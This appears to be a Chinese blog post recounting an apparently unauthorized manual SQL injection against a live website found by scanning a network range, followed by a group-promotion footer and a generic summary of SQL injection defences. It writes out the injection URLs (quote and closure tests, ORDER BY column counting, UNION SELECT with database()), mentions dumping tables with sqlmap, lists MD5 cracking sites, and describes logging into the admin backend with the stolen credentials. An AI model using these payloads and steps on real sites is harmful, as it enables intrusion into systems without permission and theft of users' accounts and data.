从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

起因:

前几天在对某一个站点进行信息搜集的时候,在C段(同网段如192.168.1-255中所有ip)的信息里面发现了某一个站点,当时看见了:

url:http://www.xxx..com/class.php?id=104

忍不住加了一个单引号来测试是否存在注入漏洞。

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

加了单引号之后没有返回信息,果不其然,存在注入漏洞

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

既然来都来了,那就来一波手动fuzz,通过手动的方式获取敏感信息吧,正好可以和大家分享一下如何手动注入。

正常的报错注入流程一般都是:

先判断注入点、注入点闭合、列数判断、得到库信息、表信息、字段信息,最后再对字段信息进行解密可以得到管理员的账号和密码。

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

测试注入点

1. 首先是测试注入点在哪,这个是正常界面下返回的信息,一切正常

http://www.xxx..com/class.php?id=104

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

2. 常见的闭合方法测试

http://www.xxx..com/class.php?id=104’--+

http://www.xxx..com/class.php?id=104” --+

http://www.xxx..com/class.php?id=104’) --+

这些经过测试发现均返回错误页面,也就证明闭合失败,无法成功闭合

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

如果不想那么复杂的话,是不是好点?直接用order by语句判断列数

过程如下:

  • http://www.xxx.com/list.php?id=104 order by 30 --+ 返回界面异常
  • http://www.xxx.com/list.php?id=104 order by 15 --+ 返回界面正常
  • http://www.xxx.com/list.php?id=104 order by 20 --+ 返回界面异常
  • 。。。。

最后通过简单的二分法测试得到当order by 22 --+ 的时候返回是正常的,因此存在22列。

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

既然知道了存在22列,使用hackbar中的联合注入工具来判断报错注入可回显注入的点。

http://www.xxx.com/list.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 --+

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

判断出了16的位置是可以回显报错数据的,因此可以使用16这个位置来获取所需要的数据。

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

首先获取当前的数据库信息,获取到当前使用数据库名xxxw_cn

http://www.xxx.com/list.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,

15,database(),17,18,19,20,21,22 --+

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

接下来使用同样的手段去获得表和字段信息,在这里不再进行赘述。

sqlmap一把梭

不是所有的注入都是适合手动去做的,这里还是用sqlmap吧,一把梭。。。

首先是payload

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

获取库中的表信息

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

获取库中的表信息

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

获取表中的字段信息,获取字段信息之后将password在md5解密平台进行解密,常见的md5解密平台有

  • https://cmd5.com/(需要注册,功能强大,难度较大的需要收费解密)
  • https://www.somd5.com/(免费)
  • https://pmd5.com/(免费)

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

后台的查找上,直接在域名后面加admin是无法跳转到后台的。

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

这里有一个小技巧,直接使用搜索引擎去搜索,针不戳,直接就找到了

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

直接使用用户的数据登录后台

从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战

 

由此可见网站安全的重要性,因为安全测试的不可或缺,相关岗位人才缺口达100多万

掌握安全测试到底有什么用?这就意味着你简历投出去就会被各种大厂抢着要!

推荐一个软件测试学习交流群:785128166,群里有分享的视频,面试指导,测试资料,还有思维导图、群里有视频,都是干货的,你可以下载来看。主要分享测试基础、接口测试、性能测试、自动化测试、TestOps架构、Jmeter、LoadRunner、Fiddler、MySql、Linux、简历优化、面试技巧以及大型测试项目实战视频资料。合理利用自己每一分每一秒的时间来学习提升自己,不要再用"没有时间“来掩饰自己思想上的懒惰!趁年轻,使劲拼,给未来的自己一个交代!

公众号:程序员二黑, 关注后免费领取海量学习资料。

好东西要和朋友一起分享哦
 

  • 6
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入漏洞挖掘实战是指通过利用SQL注入漏洞漏洞挖掘活动。SQL注入漏洞是一种常见的数据库攻击手段,用于利用应用程序对用户输入的SQL语句进行不当处理,从而导致恶意用户可以执行未经授权的数据库操作。这些操作包括读取、修改或删除数据库中的数据。 在SQL注入漏洞挖掘实战中,黑客通常会尝试通过构造特定的SQL语句来绕过应用程序的输入验证和过滤机制,以获取敏感信息或对数据库进行恶意操作。他们可能会使用各种技术和工具来自动化这个过程,并尝试发现和利用潜在的SQL注入漏洞。 为了防止SQL注入漏洞挖掘实战,开发人员应该采取以下措施: 1. 输入验证和过滤: 应用程序应该对用户输入进行严格的验证和过滤,确保只允许合法的字符和格式。使用参数化查询或预编译语句可以有效预防SQL注入攻击。 2. 最小权限原则: 数据库用户应该被授予最低权限,以限制对数据库的访问和操作。这样即使发生SQL注入攻击,黑客也只能执行有限的操作。 3. 安全编码实践: 开发人员应该熟悉安全编码实践,并使用安全的API和框架来构建应用程序。避免将用户输入直接拼接到SQL查询中,而是使用参数化查询或预编译语句。 4. 定期漏洞扫描和安全测试: 定期进行漏洞扫描和安全测试,以发现和修复潜在的SQL注入漏洞。这可以帮助及早发现和解决问题,确保应用程序的安全性。 总结起来,SQL注入漏洞挖掘实战是黑客利用SQL注入漏洞进行恶意攻击的活动。为了防止这种漏洞的利用,开发人员需要采取一系列安全措施,包括输入验证和过滤、最小权限原则、安全编码实践和定期漏洞扫描和安全测试。这些措施可以帮助保护应用程序免受SQL注入漏洞的威胁。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [SQL注入攻击实战演示(附源码)](https://blog.csdn.net/hack0919/article/details/129880265)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值